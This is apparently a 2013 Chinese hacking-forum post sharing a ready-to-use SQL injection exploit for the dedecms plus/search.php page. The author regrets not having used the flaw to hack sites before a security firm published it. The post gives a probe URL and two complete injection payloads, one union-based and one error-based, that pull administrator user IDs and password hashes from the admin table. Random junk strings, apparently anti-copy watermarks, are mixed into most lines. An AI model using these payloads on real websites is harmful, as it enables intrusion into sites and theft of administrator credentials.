中国网络渗透测试联盟

标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP [打印本页]
作者: admin    时间: 2013-1-21 08:45
标题: [通杀]dedecms plus/search.php 注入漏洞利用EXP
转载不加作者名的没JJ
4 L, T. `3 g6 {: y' C9 c) _/ [% C3 S- a* \' v. u
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
, f9 [, {9 A/ s' h1 E8 m) K
/ w' |3 A1 n* v+ s- y/ `0 i( C既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
  g* ?2 W( m# R% W- K3 Z, Z; T- \( ?9 g0 n
我一般是这样测试的:# i& \" l+ Q8 C0 V6 v9 e" ^
+ m8 S& ]5 h2 I2 e
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
! R8 M3 R! R0 H' H0 }& G! R# o, p: _7 T# [* X
转载不加作者名的没JJ
' B# ?# I+ a& |- v8 ^; U# L
! }! ?: M5 @+ ]3 o4 [* E3 b5 J/ W作者:鬼哥# T" J3 K9 d1 C5 ^
; F( b& a" f1 ^7 ~

6 M: I- n7 t1 W' ~. {9 Q4 Y6 Y2 X) A/ Y8 N0 g. C* ^. ?
看结果如果提示' Y7 t9 G. N/ O" w

' Y6 w2 t8 X& q4 z# H' d5 U5 |Safe Alert: Request Error step 2 !
5 \# Q( x2 V4 ~  }! ?
# c$ B9 W" z' T% w, [& x那么直接用下面的exp5 n/ F5 w- R! x" `8 H
" x# m, x0 k. `) D0 N0 k+ ~( f& Z
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
: N% x& x* G3 z4 Q
+ a  A' K  Y6 a4 z8 c7 ]' ]/ m
看结果如果提示
8 @( I; U5 W  T3 x/ F" F5 F) y0 V7 `# Z7 Q. C, ]
Safe Alert: Request Error step 1 !3 f& f2 B, s. _- |5 y
/ E( ^- [! N! R2 E. H  H/ h4 e& |; q
那么直接用下面的exp" a/ i- w; t& H0 }% j

+ S$ b% K( z) N3 |8 n% h( Dxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a, a& P8 U4 v% m- @: {8 A4 {! O
- k! U1 d& Q' {5 M4 l- k* ?
0 [: m1 h: ~3 T* G
如果正常显示证明漏洞不存在了。+ M' f$ O" p$ `: C) J. k/ V: |* w
: f! q% `, _, j; D  \
转载不加作者名的没JJ



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2